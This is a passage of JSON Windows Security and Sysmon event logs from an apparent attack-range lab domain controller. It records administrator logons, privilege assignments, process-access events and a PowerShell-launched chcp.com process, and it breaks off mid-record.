{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220481,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{A79C0059-3622-45CB-AE95-532C81A8115C}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{A79C0059-3622-45CB-AE95-532C81A8115C}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220482,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x66E06\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{A79C0059-3622-45CB-AE95-532C81A8115C}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x66e06","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{A79C0059-3622-45CB-AE95-532C81A8115C}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220483,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x66E06\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x66e06","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4367,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.092\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.092","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4368,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.092\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.092","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4369,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.093\r\nProcessGuid: {A837DB8D-030E-5F25-0000-00102C6E0600}\r\nProcessId: 2852\r\nImage: C:\\Windows\\System32\\chcp.com\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Change CodePage Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CHCP.COM\r\nCommandLine: \"C:\\Windows\\system32\\chcp.com\" 65001\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-030D-5F25-0000-0020B5520600}\r\nLogonId: 0x652B5\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD\r\nParentProcessGuid: {A837DB8D-030D-5F25-0000-001067620600}\r\nParentProcessId: 2968\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.093","ProcessGuid":"{A837DB8D-030E-5F25-0000-00102C6E0600}","Image":"C:\\Windows\\System32\\chcp.com","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Change CodePage Utility","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"CHCP.COM","CommandLine":"\"C:\\Windows\\system32\\chcp.com\" 65001","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-030D-5F25-0000-0020B5520600}","LogonId":"0x652b5","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD","ParentProcessGuid":"{A837DB8D-030D-5F25-0000-001067620600}","ParentProcessId":"2968","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4370,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.092\r\nSourceProcessGUID: {A837DB8D-030D-5F25-0000-001067620600}\r\nSourceProcessId: 2968\r\nSourceThreadId: 3368\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-030E-5F25-0000-00102C6E0600}\r\nTargetProcessId: 2852\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98992f4b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e52d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e36251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e281d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34709(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e342fc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e1ab57(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e1a127(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.092","SourceProcessGUID":"{A837DB8D-030D-5F25-0000-001067620600}","SourceProcessId":"2968","SourceThreadId":"3368","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-030E-5F25-0000-00102C6E0600}","TargetProcessId":"2852","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98992f4b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488c(wow64)|C:\\Windows\\assembly\\NativeImages_